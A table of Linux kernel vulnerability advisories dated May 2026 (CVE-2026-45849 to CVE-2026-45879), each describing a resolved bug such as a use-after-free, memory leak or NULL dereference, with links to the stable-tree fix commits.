| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net: mscc: ocelot: add missing lock protection in ocelot_port_xmit_inj() ocelot_port_xmit_inj() calls ocelot_can_inject() and ocelot_port_inject_frame() without holding the injection group lock. Both functions contain lockdep_assert_held() for the injection lock, and the correct caller felix_port_deferred_xmit() properly acquires the lock using ocelot_lock_inj_grp() before calling these functions. Add ocelot_lock_inj_grp()/ocelot_unlock_inj_grp() around the register injection path to fix the missing lock protection. The FDMA path is not affected as it uses its own locking mechanism. | 2026-05-27 | not yet calculated | CVE-2026-45849 | https://git.kernel.org/stable/c/0b217a40156f497e09dd20d3f7baec40c785f386 https://git.kernel.org/stable/c/cc1b179f778f98270bdbbb48d183b4b6427ae198 https://git.kernel.org/stable/c/7ac58d8832802ec89baa7539e13e6d58a88cce04 https://git.kernel.org/stable/c/51c32ae7fae14552d79f7139614b77c1bbd57a48 https://git.kernel.org/stable/c/63da961381e0d979459dede713001f8452364477 https://git.kernel.org/stable/c/026f6513c5880c2c89e38ad66bbec2868f978605 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ipvs: skip ipv6 extension headers for csum checks Protocol checksum validation fails for IPv6 if there are extension headers before the protocol header. iph->len already contains its offset, so use it to fix the problem. | 2026-05-27 | not yet calculated | CVE-2026-45850 | https://git.kernel.org/stable/c/a3ca27762ce8476b4fbf9b2a8f5cb74c38e483e4 https://git.kernel.org/stable/c/05cfe9863ef049d98141dc2969eefde72fb07625 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: efi: Fix reservation of unaccepted memory table The reserve_unaccepted() function incorrectly calculates the size of the memblock reservation for the unaccepted memory table. It aligns the size of the table, but fails to account for cases where the table's starting physical address (efi.unaccepted) is not page-aligned. If the table starts at an offset within a page and its end crosses into a subsequent page that the aligned size does not cover, the end of the table will not be reserved. This can lead to the table being overwritten or inaccessible, causing a kernel panic in accept_memory(). This issue was observed when starting Intel TDX VMs with specific memory sizes (e.g., > 64GB). Fix this by calculating the end address first (including the unaligned start) and then aligning it up, ensuring the entire range is covered by the reservation. | 2026-05-27 | not yet calculated | CVE-2026-45851 | https://git.kernel.org/stable/c/b7bc182ec1846be437351e44164089d988f9d0dd https://git.kernel.org/stable/c/ba6b6f1502fa55621d1db23f253d54322bdbe4e0 https://git.kernel.org/stable/c/9b18bf59977f5c5bc3b11b210520f62500a7adf3 https://git.kernel.org/stable/c/e649b5916725c68f44ebf45fb396df563c5dbaf2 https://git.kernel.org/stable/c/0862438c90487e79822d5647f854977d50381505 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm/amdgpu: Use kvfree instead of kfree in amdgpu_gmc_get_nps_memranges() amdgpu_discovery_get_nps_info() internally allocates memory for ranges using kvcalloc(), which may use vmalloc() for large allocation. Using kfree() to release vmalloc memory will lead to a memory corruption. Use kvfree() to safely handle both kmalloc and vmalloc allocations. Compile tested only. Issue found using a prototype static analysis tool and code review. | 2026-05-27 | not yet calculated | CVE-2026-45853 | https://git.kernel.org/stable/c/16e7e7ad8cdc6b4c4af7f31e262f1494c1b2a55e https://git.kernel.org/stable/c/9ae85b0c1909b6c6bfd2636b04cdaf7f520bf2b5 https://git.kernel.org/stable/c/f441538893eba6347b983f2904819ca6c99da65e https://git.kernel.org/stable/c/0c44d61945c4a80775292d96460aa2f22e62f86c |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: crypto: inside-secure/eip93 - unregister only available algorithm EIP93 has an options register. This register indicates which crypto algorithms are implemented in silicon. Supported algorithms are registered on this basis. Unregister algorithms on the same basis. Currently, all algorithms are unregistered, even those not supported by HW. This results in panic on platforms that don't have all options implemented in silicon. | 2026-05-27 | not yet calculated | CVE-2026-45854 | https://git.kernel.org/stable/c/243d642ff5809811208fa1707b7ab8a6ab4b1d68 https://git.kernel.org/stable/c/4c1c5a1d720fdacea060e106c7dd79417243d121 https://git.kernel.org/stable/c/0ceeadc7b53a041d89d5843f6bf0ccb7c98b0b4f |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ata: libata-scsi: avoid Non-NCQ command starvation When a non-NCQ command is issued while NCQ commands are being executed, ata_scsi_qc_issue() indicates to the SCSI layer that the command issuing should be deferred by returning SCSI_MLQUEUE_XXX_BUSY. This command deferring is correct and as mandated by the ACS specifications since NCQ and non-NCQ commands cannot be mixed. However, in the case of a host adapter using multiple submission queues, when the target device is under a constant load of NCQ commands, there are no guarantees that requeueing the non-NCQ command will be executed later and it may be deferred again repeatedly as other submission queues can constantly issue NCQ commands from different CPUs ahead of the non-NCQ command. This can lead to very long delays for the execution of non-NCQ commands, and even complete starvation for these commands in the worst case scenario. Since the block layer and the SCSI layer do not distinguish between queueable (NCQ) and non-queueable (non-NCQ) commands, the libata-scsi SAT implementation must ensure forward progress for non-NCQ commands in the presence of NCQ command traffic. This is similar to what SAS HBAs with a hardware/firmware based SAT implementation do. Implement such forward progress guarantee by limiting requeueing of non-NCQ commands from ata_scsi_qc_issue(): when a non-NCQ command is received and NCQ commands are in-flight, do not force a requeue of the non-NCQ command by returning SCSI_MLQUEUE_XXX_BUSY and instead return 0 to indicate that the command was accepted but hold on to the qc using the new deferred_qc field of struct ata_port. This deferred qc will be issued using the work item deferred_qc_work running the function ata_scsi_deferred_qc_work() once all in-flight commands complete, which is checked with the port qc_defer() callback return value indicating that no further delay is necessary. This check is done using the helper function ata_scsi_schedule_deferred_qc() which is called from ata_scsi_qc_complete(). This thus excludes this mechanism from all internal non-NCQ commands issued by ATA EH. When a port deferred_qc is non-NULL, that is, the port has a command waiting for the device queue to drain, the issuing of all incoming commands (both NCQ and non-NCQ) is deferred using the regular busy mechanism. This simplifies the code and also avoids potential denial of service problems if a user issues too many non-NCQ commands. Finally, whenever ata EH is scheduled, regardless of the reason, a deferred qc is always requeued so that it can be retried once EH completes. This is done by calling the function ata_scsi_requeue_deferred_qc() from ata_eh_set_pending(). This avoids the need for any special processing for the deferred qc in case of NCQ error, link or device reset, or device timeout. | 2026-05-27 | not yet calculated | CVE-2026-45855 | https://git.kernel.org/stable/c/ce22aaed011206fed9cbd8c9c2d44718607f31ee https://git.kernel.org/stable/c/888cd7e40adb2ef4af1b4d3b6e2e83ad409ae8c2 https://git.kernel.org/stable/c/5d61a38a60e62750526d94663b69b7ac5c7f07a5 https://git.kernel.org/stable/c/0ea84089dbf62a92dc7889c79e6b18fc89260808 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: scsi: csiostor: Fix dereference of null pointer rn The error exit path when rn is NULL ends up dereferencing the null pointer rn via the use of the macro CSIO_INC_STATS. Fix this by adding a new error return path label after the use of the macro to avoid the dereference. | 2026-05-27 | not yet calculated | CVE-2026-45857 | https://git.kernel.org/stable/c/16ccbfddcb32365138c806cf572e69b42a193c5c https://git.kernel.org/stable/c/44ef9f81392de885883f73b9f5c43936a82ae9d7 https://git.kernel.org/stable/c/526ea3c0ccd495b0079db3e28fdddd51c1bf01f7 https://git.kernel.org/stable/c/25d623f0d77c11a256a54e860d00c239aa9a2583 https://git.kernel.org/stable/c/6037124dbf675fbd0a6248aaf04cf07387b8c323 https://git.kernel.org/stable/c/25ab5e97d3c5f3ed594b4a65d1cc99dc24756681 https://git.kernel.org/stable/c/3bbbab7b6949c76df64210348adbefedaabbf549 https://git.kernel.org/stable/c/1982257570b84dc33753d536dd969fd357a014e9 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ext4: don't zero the entire extent if EXT4_EXT_DATA_PARTIAL_VALID1 When allocating initialized blocks from a large unwritten extent, or when splitting an unwritten extent during end I/O and converting it to initialized, there is currently a potential issue of stale data if the extent needs to be split in the middle. 0 A B N [UUUUUUUUUUUU] U: unwritten extent [--DDDDDDDD--] D: valid data |<- ->| ----> this range needs to be initialized ext4_split_extent() first tries to split this extent at B with the EXT4_EXT_DATA_ENTIRE_VALID1 and EXT4_EXT_MAY_ZEROOUT flags set, but ext4_split_extent_at() fails to split this extent due to a temporary lack of space. It zeroes out B to N and marks the entire extent from 0 to N as written. 0 A B N [WWWWWWWWWWWW] W: written extent [SSDDDDDDDDZZ] Z: zeroed, S: stale data ext4_split_extent() then tries to split this extent at A with the EXT4_EXT_DATA_VALID2 flag set. This time, it splits successfully and leaves a stale written extent from 0 to A. 0 A B N [WW|WWWWWWWWWW] [SS|DDDDDDDDZZ] Fix this by passing EXT4_EXT_DATA_PARTIAL_VALID1 to ext4_split_extent_at() when splitting at B: do not convert the entire extent to written, and leave it as unwritten after zeroing out B to N. The remaining work is just like the standard two-part split. ext4_split_extent() will pass the EXT4_EXT_DATA_VALID2 flag when it calls ext4_split_extent_at() for the second time, allowing it to properly handle the split. If the split is successful, it will keep the extent from 0 to A as unwritten. | 2026-05-27 | not yet calculated | CVE-2026-45858 | https://git.kernel.org/stable/c/58ddae5d77b1db3a27b891c75a8fa120239ac092 https://git.kernel.org/stable/c/d17857b4fb9ba5745b59be0ef38fd532991fccbf https://git.kernel.org/stable/c/d67c8ecf3d8fda9b8ef80e6f665d84b6d6ac9d88 https://git.kernel.org/stable/c/7015fcf473796e1d2d876f241bd9e0c36f3d4eef https://git.kernel.org/stable/c/1bf6974822d1dba86cf11b5f05498581cf3488a2 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: i3c: dw: Fix memory leak in dw_i3c_master_i2c_xfers() The dw_i3c_master_i2c_xfers() function allocates memory for the xfer structure using dw_i3c_master_alloc_xfer(). If pm_runtime_resume_and_get() fails, the function returns without freeing the allocated xfer, resulting in a memory leak. Add a dw_i3c_master_free_xfer() call to the error path to ensure the allocated memory is properly freed. Compile tested only. Issue found using a prototype static analysis tool and code review. | 2026-05-27 | not yet calculated | CVE-2026-45863 | https://git.kernel.org/stable/c/140a45bd4f6db7d1b30cab967d29689b946c52fa https://git.kernel.org/stable/c/8e71414e252c1cb235911008a98fd47927d3a55c https://git.kernel.org/stable/c/a2c41467ef42f69a3958493a0395ba75174710dc https://git.kernel.org/stable/c/2537089413514caaa9a5fdeeac3a34d45100f747 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: fs/ntfs3: prevent infinite loops caused by the next valid being the same When processing valid within the range [valid : pos), if valid cannot be retrieved correctly, for example, if the retrieved valid value is always the same, this can trigger a potential infinite loop, similar to the hung problem reported by syzbot [1]. Adding a check for the valid value within the loop body, and terminating the loop and returning -EINVAL if the value is the same as the current value, can prevent this. [1] INFO: task syz.4.21:6056 blocked for more than 143 seconds. Call Trace: rwbase_write_lock+0x14f/0x750 kernel/locking/rwbase_rt.c:244 inode_lock include/linux/fs.h:1027 [inline] ntfs_file_write_iter+0xe6/0x870 fs/ntfs3/file.c:1284 | 2026-05-27 | not yet calculated | CVE-2026-45864 | https://git.kernel.org/stable/c/50c822fcb36768f1fb356f05b02a2248ef81936d https://git.kernel.org/stable/c/6d93239b4fc479f7c0a412dd196ec0ca2672d14a https://git.kernel.org/stable/c/71c8b966ec56e13c02388c1312910588bb49be7a https://git.kernel.org/stable/c/b97e371e5d1c13d722335d46eb8bc1a22b272a0e https://git.kernel.org/stable/c/4bf3bafb8e0635ed93e3cd4156dcbcc0fb960cb4 https://git.kernel.org/stable/c/a47a2bb9aa6455d5cee1045814a60c749309c92b https://git.kernel.org/stable/c/27b75ca4e51e3e4554dc85dbf1a0246c66106fd3 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: mctp i2c: initialise event handler read bytes Set a 0xff value for i2c reads of an mctp-i2c device. Otherwise reads will return "val" from the i2c bus driver. For i2c-aspeed and i2c-npcm7xx that is a stack uninitialised u8. Tested with "i2ctransfer -y 1 r10@0x34" where 0x34 is a mctp-i2c instance, now it returns all 0xff. | 2026-05-27 | not yet calculated | CVE-2026-45865 | https://git.kernel.org/stable/c/93e01e837e105299f1c259ef71f6e1ec4fe806e3 https://git.kernel.org/stable/c/11f83253244060b5de5eac787f61ae3f3e559d01 https://git.kernel.org/stable/c/fa9861e5c8af7651dddfa8d490aaada17ae33b6c https://git.kernel.org/stable/c/6ff2ebfef75fbc57d937d8fbe738b967edf2d331 https://git.kernel.org/stable/c/1eeedb310229bfee9dd4d992e5bba33fe1378a8f https://git.kernel.org/stable/c/2a14e91b6d76639dac70ea170f4384c1ee3cb48d |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: serial: caif: fix use-after-free in caif_serial ldisc_close() There is a use-after-free bug in caif_serial where handle_tx() may access ser->tty after the tty has been freed. The race condition occurs between ldisc_close() and packet transmission: CPU 0 (close) CPU 1 (xmit) ------------- ------------ ldisc_close() tty_kref_put(ser->tty) [tty may be freed here] <-- race window --> caif_xmit() handle_tx() tty = ser->tty // dangling ptr tty->ops->write() // UAF! schedule_work() ser_release() unregister_netdevice() The root cause is that tty_kref_put() is called in ldisc_close() while the network device is still active and can receive packets. Since ser and tty have a 1:1 binding relationship with consistent lifecycles (ser is allocated in ldisc_open and freed in ser_release via unregister_netdevice, and each ser binds exactly one tty), we can safely defer the tty reference release to ser_release() where the network device is unregistered. Fix this by moving tty_kref_put() from ldisc_close() to ser_release(), after unregister_netdevice(). This ensures the tty reference is held as long as the network device exists, preventing the UAF. Note: We save ser->tty before unregister_netdevice() because ser is embedded in netdev's private data and will be freed along with netdev (needs_free_netdev = true). How to reproduce: Add mdelay(500) at the beginning of ldisc_close() to widen the race window, then run the reproducer program [1]. Note: There is a separate deadloop issue in handle_tx() when using PORT_UNKNOWN serial ports (e.g., /dev/ttyS3 in QEMU without proper serial backend). This deadloop exists even without this patch, and is likely caused by inconsistency between uart_write_room() and uart_write() in serial core. It has been addressed in a separate patch [2]. KASAN report: ================================================================== BUG: KASAN: slab-use-after-free in handle_tx+0x5d1/0x620 Read of size 1 at addr ffff8881131e1490 by task caif_uaf_trigge/9929 Call Trace: <TASK> dump_stack_lvl+0x10e/0x1f0 print_report+0xd0/0x630 kasan_report+0xe4/0x120 handle_tx+0x5d1/0x620 dev_hard_start_xmit+0x9d/0x6c0 __dev_queue_xmit+0x6e2/0x4410 packet_xmit+0x243/0x360 packet_sendmsg+0x26cf/0x5500 __sys_sendto+0x4a3/0x520 __x64_sys_sendto+0xe0/0x1c0 do_syscall_64+0xc9/0xf80 entry_SYSCALL_64_after_hwframe+0x77/0x7f RIP: 0033:0x7f615df2c0d7 Allocated by task 9930: Freed by task 64: Last potentially related work creation: The buggy address belongs to the object at ffff8881131e1000 which belongs to the cache kmalloc-cg-2k of size 2048 The buggy address is located 1168 bytes inside of freed 2048-byte region [ffff8881131e1000, ffff8881131e1800) The buggy address belongs to the physical page: page_owner tracks the page as allocated page last free pid 9778 tgid 9778 stack trace: Memory state around the buggy address: ffff8881131e1380: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb ffff8881131e1400: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb >ffff8881131e1480: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb ^ ffff8881131e1500: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb ffff8881131e1580: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb ================================================================== [1]: https://gist.github.com/mrpre/f683f244544f7b11e7fa87df9e6c2eeb [2]: https://lore.kernel.org/linux-serial/20260204074327.226165-1-jiayuan.chen@linux.dev/T/#u | 2026-05-27 | not yet calculated | CVE-2026-45866 | https://git.kernel.org/stable/c/5e266ba8d330d3b8e5bc198f238cd8901826cfa1 https://git.kernel.org/stable/c/d3c75db4e0460641dbcd274b40867e252d801da1 https://git.kernel.org/stable/c/4e63d6f68544ae5269ac9735ae5b69b59b5b8725 https://git.kernel.org/stable/c/331e2b7051635780edea248dd08ae2026c126f4a https://git.kernel.org/stable/c/52731ef4438155cea782fac74e547a327ab9e7c5 https://git.kernel.org/stable/c/c8c197aaa56b25a2d54f3aa07e27e228d6c08546 https://git.kernel.org/stable/c/40962f2bf8cdba63af23aec95ad3f49b689e58e2 https://git.kernel.org/stable/c/308e7e4d0a846359685f40aade023aee7b27284c |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: power: supply: act8945a: Fix use-after-free in power_supply_changed() Using the `devm_` variant for requesting IRQ _before_ the `devm_` variant for allocating/registering the `power_supply` handle, means that the `power_supply` handle will be deallocated/unregistered _before_ the interrupt handler (since `devm_` naturally deallocates in reverse allocation order). This means that during removal, there is a race condition where an interrupt can fire just _after_ the `power_supply` handle has been freed, *but* just _before_ the corresponding unregistration of the IRQ handler has run. This will lead to the IRQ handler calling `power_supply_changed()` with a freed `power_supply` handle. Which usually crashes the system or otherwise silently corrupts the memory... Note that there is a similar situation which can also happen during `probe()`; the possibility of an interrupt firing _before_ registering the `power_supply` handle. This would then lead to the nasty situation of using the `power_supply` handle *uninitialized* in `power_supply_changed()`. Fix this racy use-after-free by making sure the IRQ is requested _after_ the registration of the `power_supply` handle. | 2026-05-27 | not yet calculated | CVE-2026-45867 | https://git.kernel.org/stable/c/f2a0777b1e5a3cee1712c4d3e9095c0df8fc8cb3 https://git.kernel.org/stable/c/0768e8525a46df103647ca5059b32320d7fd17e4 https://git.kernel.org/stable/c/d023ef9f748b2090f7a9dbdd5c622b6ad99088ea https://git.kernel.org/stable/c/697bb5dc0cb4791e244f3970b067bc1ef33be9d9 https://git.kernel.org/stable/c/76a42ba547a9b2e2337894f67a4d9247445007d5 https://git.kernel.org/stable/c/f27eb76def5c07e4d7cc468b40741f19dafc83ce https://git.kernel.org/stable/c/83c1bd466c514cb24ca6ef347c5aac76a13c4e1e https://git.kernel.org/stable/c/3291c51d4684d048dd2eb91b5b65fcfdaf72141f |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: pinctrl: single: fix refcount leak in pcs_add_gpio_func() of_parse_phandle_with_args() returns a device_node pointer with refcount incremented in gpiospec.np. The loop iterates through all phandles but never releases the reference, causing a refcount leak on each iteration. Add of_node_put() calls to release the reference after extracting the needed arguments and on the error path when devm_kzalloc() fails. This bug was detected by our static analysis tool and verified by my code review. | 2026-05-27 | not yet calculated | CVE-2026-45868 | https://git.kernel.org/stable/c/191bfd5710d6a7f48ba4315d8d3e908dcc15243c https://git.kernel.org/stable/c/3e3b28bb0b6ddc521a4fdd1c1ba0d35017a0796b https://git.kernel.org/stable/c/456a60d06c09a92680dc35fabca68024badcc28e https://git.kernel.org/stable/c/99cc7352156c65201c675f750e0e77c4c73d93f5 https://git.kernel.org/stable/c/7814b1431848854b56717086e2b61bea3c59753d https://git.kernel.org/stable/c/e2e367e56bacb93ce5ac73f0b3297d5c83d38dd4 https://git.kernel.org/stable/c/5b9e84d27e310f22c4ba45fedbc4f5baf43dd823 https://git.kernel.org/stable/c/353353309b0f7afa407df29e455f9d15b5acc296 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: power: supply: wm97xx: Fix NULL pointer dereference in power_supply_changed() In `probe()`, `request_irq()` is called before allocating/registering a `power_supply` handle. If an interrupt is fired between the call to `request_irq()` and `power_supply_register()`, the `power_supply` handle will be used uninitialized in `power_supply_changed()` in `wm97xx_bat_update()` (triggered from the interrupt handler). This will lead to a `NULL` pointer dereference since Fix this racy `NULL` pointer dereference by making sure the IRQ is requested _after_ the registration of the `power_supply` handle. Since the IRQ is the last thing requested in `probe()` now, remove the error path for freeing it. Instead add one for unregistering the `power_supply` handle when the IRQ request fails. | 2026-05-27 | not yet calculated | CVE-2026-45869 | https://git.kernel.org/stable/c/3d7b5391bb95505b3581c1fb77150c467ab92864 https://git.kernel.org/stable/c/438f9a303ea8b55162b2d5376490c2ab3ec165a0 https://git.kernel.org/stable/c/9b7d77cb046b4487e8e511e04e62b6f416ce845c https://git.kernel.org/stable/c/86183153c299e8bb1839e717286d6c6f39508a59 https://git.kernel.org/stable/c/93bdf715d33cf5ee01c58e8546c2469c71ce082a https://git.kernel.org/stable/c/c0def811ad8d642dca9b6d31a198cc39f5f90837 https://git.kernel.org/stable/c/dfaf235d5a6b60cbf115a14a656946303ad007b7 https://git.kernel.org/stable/c/39fe0eac6d755ef215026518985fcf8de9360e9e |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: SUNRPC: auth_gss: fix memory leaks in XDR decoding error paths The gssx_dec_ctx(), gssx_dec_status(), and gssx_dec_name() functions allocate memory via gssx_dec_buffer(), which calls kmemdup(). When a subsequent decode operation fails, these functions return immediately without freeing previously allocated buffers, causing memory leaks. The leak in gssx_dec_ctx() is particularly relevant because the caller (gssp_accept_sec_context_upcall) initializes several buffer length fields to non-zero values, resulting in memory allocation: struct gssx_ctx rctxh = { .exported_context_token.len = GSSX_max_output_handle_sz, .mech.len = GSS_OID_MAX_LEN, .src_name.display_name.len = GSSX_max_princ_sz, .targ_name.display_name.len = GSSX_max_princ_sz }; If, for example, gssx_dec_name() succeeds for src_name but fails for targ_name, the memory allocated for exported_context_token, mech, and src_name.display_name remains unreferenced and cannot be reclaimed. Add error handling with goto-based cleanup to free any previously allocated buffers before returning an error. | 2026-05-27 | not yet calculated | CVE-2026-45870 | https://git.kernel.org/stable/c/c81431b1b9fbd21e9a5a9211b5517b7295d18e6a https://git.kernel.org/stable/c/caf7eff432e91a9eba1c79fa545c2f54be15d62b https://git.kernel.org/stable/c/64303b92d94c0c7845a273acd8d84b796d6f1db7 https://git.kernel.org/stable/c/df10f23defff22c8d55fe6db74f6e4ce927145bf https://git.kernel.org/stable/c/b4af3806846778799cd4ab0766dc18341e777264 https://git.kernel.org/stable/c/d79b9097a6a2b91471b40755f1225364be5d85ff https://git.kernel.org/stable/c/3b56eb90feb8a3709417f5624f3871847d42bcb1 https://git.kernel.org/stable/c/3e6397b056335cc56ef0e9da36c95946a19f5118 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: tpm: st33zp24: Fix missing cleanup on get_burstcount() error get_burstcount() can return -EBUSY on timeout. When this happens, st33zp24_send() returns directly without releasing the locality acquired earlier. Use goto out_err to ensure proper cleanup when get_burstcount() fails. | 2026-05-27 | not yet calculated | CVE-2026-45871 | https://git.kernel.org/stable/c/e0ce3da82341fcd6194175f1837946b2a894c625 https://git.kernel.org/stable/c/7687133509cf66ced120b667fefd21f80bf17993 https://git.kernel.org/stable/c/1256c6dc96d1e687e6e9b63088156ed07411b00c https://git.kernel.org/stable/c/a51cff9be046e13e1c1b2fe45d5c48b582ec9b8c https://git.kernel.org/stable/c/cc09d55f519e15355de343264a22ac6682b8305e https://git.kernel.org/stable/c/ec15eb67fe9df87981b4829b901ec254273ca483 https://git.kernel.org/stable/c/4fffb77d35d038f146e6192da583dbe4971d869e https://git.kernel.org/stable/c/3e91b44c93ad2871f89fc2a98c5e4fe6ca5db3d9 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: scsi: smartpqi: Fix memory leak in pqi_report_phys_luns() pqi_report_phys_luns() fails to release the rpl_list buffer when encountering an unsupported data format or when the allocation for rpl_16byte_wwid_list fails. These early returns bypass the cleanup logic, leading to memory leaks. Consolidate the error handling by adding an out_free_rpl_list label and use goto statements to ensure rpl_list is consistently freed on failure. Compile tested only. Issue found using a prototype static analysis tool and code review. | 2026-05-27 | not yet calculated | CVE-2026-45872 | https://git.kernel.org/stable/c/f471ecfec093e39ef8fd08978413793087daa14d https://git.kernel.org/stable/c/fdf1188cfa80f88c9f18d58cb33d57ff40e70e26 https://git.kernel.org/stable/c/d52e13122d3771f753dd73ae6512fa01f58015cb https://git.kernel.org/stable/c/e5579ebaadc7b699868dad0f591a7bf83cd647e1 https://git.kernel.org/stable/c/454570434114e4862767f506a442a0f110b639b2 https://git.kernel.org/stable/c/41b37312bd9722af77ec7817ccf22d7a4880c289 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: netfilter: nft_set_rbtree: check for partial overlaps in anonymous sets Userspace provides an optimized representation in case intervals are adjacent, where the end element is omitted. The existing partial overlap detection logic skips anonymous set checks on start elements for this reason. However, it is possible to add intervals that overlap to this anonymous set where two start elements share the same start, e.g. A-B, A-C where C < B. start end A B start end A C Restore the check on overlapping start elements to report an overlap. | 2026-05-27 | not yet calculated | CVE-2026-45873 | https://git.kernel.org/stable/c/7ca5813e1b21ef300e04593f47b073ef3217aac6 https://git.kernel.org/stable/c/029e5f6a95e905b12d6bc20421be32a01e0eb311 https://git.kernel.org/stable/c/f1381ce0a1dd013610985e1c4260908163a427df https://git.kernel.org/stable/c/f1535d56fc3f6c625b7e0559c006bd0318791bb1 https://git.kernel.org/stable/c/05feaf826390fd16f1deb89dd9412def3b2a280f https://git.kernel.org/stable/c/dad14d22dff1a191612acb98facceb303d0524a2 https://git.kernel.org/stable/c/e6497e06a102870803a59570d75ed2c36d7e11b3 https://git.kernel.org/stable/c/4780ec142cbb24b794129d3080eee5cac2943ffc |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: phy: freescale: imx8qm-hsio: fix NULL pointer dereference During the probe the refclk_pad pointer is set to NULL if the 'fsl,refclk-pad-mode' property is not defined in the devicetree node. But in imx_hsio_configure_clk_pad() this pointer is unconditionally used, which could result in a NULL pointer dereference. So check the pointer before using it. | 2026-05-27 | not yet calculated | CVE-2026-45874 | https://git.kernel.org/stable/c/a771b386cb6c6e582e7b50f8eeff3347ff887f71 https://git.kernel.org/stable/c/dd8b9ba3d9701832cfb5dcefd8b43250df28dbc2 https://git.kernel.org/stable/c/8d29e81e9cdec84d4b9acb1736550d35e86c88af https://git.kernel.org/stable/c/4dd5d4c0361af0a3fd24f45c815996abf4429770 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: mfd: arizona: Fix regulator resource leak on wm5102_clear_write_sequencer() failure The wm5102_clear_write_sequencer() helper may return an error and just return, bypassing the cleanup sequence and causing regulators to remain enabled, leading to a resource leak. Change the direct return to jump to the err_reset label to properly free the resources. | 2026-05-27 | not yet calculated | CVE-2026-45875 | https://git.kernel.org/stable/c/54eafc1b0dbcf79c5f8b6dc8d9e92e56b9384c0a https://git.kernel.org/stable/c/933c5463873582baaecf5c38401ec4095b1c6269 https://git.kernel.org/stable/c/445cec7b4fbb1546836ae8e332d158e8d37d0fb6 https://git.kernel.org/stable/c/3ea01691738b0decb63ea2705d2cdf27f6f26fc0 https://git.kernel.org/stable/c/e0527c09bcf1e6beeb685a7f4177683866b8609c https://git.kernel.org/stable/c/5a4923726a165593d7601834a6fb2a10ab47b85d https://git.kernel.org/stable/c/2049820d1e635e467d795237fd40287213d92349 https://git.kernel.org/stable/c/4feb753ba6e5e5bbaba868b841a2db41c21e56fa |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: arm64/gcs: Fix error handling in arch_set_shadow_stack_status() alloc_gcs() returns an error-encoded pointer on failure, which comes from do_mmap(), not NULL. The current NULL check fails to detect errors, which could lead to using an invalid GCS address. Use IS_ERR_VALUE() to properly detect errors, consistent with the check in gcs_alloc_thread_stack(). | 2026-05-27 | not yet calculated | CVE-2026-45876 | https://git.kernel.org/stable/c/c787a235deb33be6eda40beee8f561da5fd8cb8c https://git.kernel.org/stable/c/a4741114c9622346c4bbb8cc2bbd88153616ffaf https://git.kernel.org/stable/c/53c998527ffa60f9deda8974a11ad39790684159 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: HID: intel-ish-hid: fix NULL-ptr-deref in ishtp_bus_remove_all_clients During a warm reset flow, the cl->device pointer may be NULL if the reset occurs while clients are still being enumerated. Accessing cl->device->reference_count without a NULL check leads to a kernel panic. This issue was identified during multi-unit warm reboot stress cycles. Add a defensive NULL check for cl->device to ensure stability under such intensive testing conditions. KASAN: null-ptr-deref in range [0000000000000000-0000000000000007] Workqueue: ish_fw_update_wq fw_reset_work_fn Call Trace: ishtp_bus_remove_all_clients+0xbe/0x130 [intel_ishtp] ishtp_reset_handler+0x85/0x1a0 [intel_ishtp] fw_reset_work_fn+0x8a/0xc0 [intel_ish_ipc] | 2026-05-27 | not yet calculated | CVE-2026-45877 | https://git.kernel.org/stable/c/0b605e8ce60698c27a26f512968a597fd620d2e8 https://git.kernel.org/stable/c/feb4bcfd405282de60aba321f13a1272b30c5af4 https://git.kernel.org/stable/c/272dac57caa981718e7188c80c703e7bb1998054 https://git.kernel.org/stable/c/56f7db581ee73af53cd512e00a6261a025bf1d58 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: power: supply: bq25980: Fix use-after-free in power_supply_changed() Using the `devm_` variant for requesting IRQ _before_ the `devm_` variant for allocating/registering the `power_supply` handle, means that the `power_supply` handle will be deallocated/unregistered _before_ the interrupt handler (since `devm_` naturally deallocates in reverse allocation order). This means that during removal, there is a race condition where an interrupt can fire just _after_ the `power_supply` handle has been freed, *but* just _before_ the corresponding unregistration of the IRQ handler has run. This will lead to the IRQ handler calling `power_supply_changed()` with a freed `power_supply` handle. Which usually crashes the system or otherwise silently corrupts the memory... Note that there is a similar situation which can also happen during `probe()`; the possibility of an interrupt firing _before_ registering the `power_supply` handle. This would then lead to the nasty situation of using the `power_supply` handle *uninitialized* in `power_supply_changed()`. Fix this racy use-after-free by making sure the IRQ is requested _after_ the registration of the `power_supply` handle. | 2026-05-27 | not yet calculated | CVE-2026-45879 | https://git.kernel.org/stable/c/86f93dfb23f5bf4f285c4256a7e909d222f7de56 https://git.kernel.org/stable/c/16875e3b7bc9e59bfa0acaf1e43f275a6f42a30f https://git.kernel.org/stable/c/0560a4b09c92e2ecaa883965cf6f9ca51c158ff9 https://git.kernel.org/stable/c/0de95d29d847c6217b7d5845e24a71a4aee7b359 https://git.kernel.org/stable/c/4aeaf03c17260415c2fdd55992f9ad4188d5455a https://git.kernel.org/stable/c/03d1e4ee4e6aa6d2966e883e4ca0e5be73bf1b7c https://git.kernel.org/stable/c/abea607ff2f62f4c0a5fb29f7fbdaaab163276a4 https://git.kernel.org/stable/c/5f0b1cb41906e86b64bf69f5ededb83b0d757c27 |
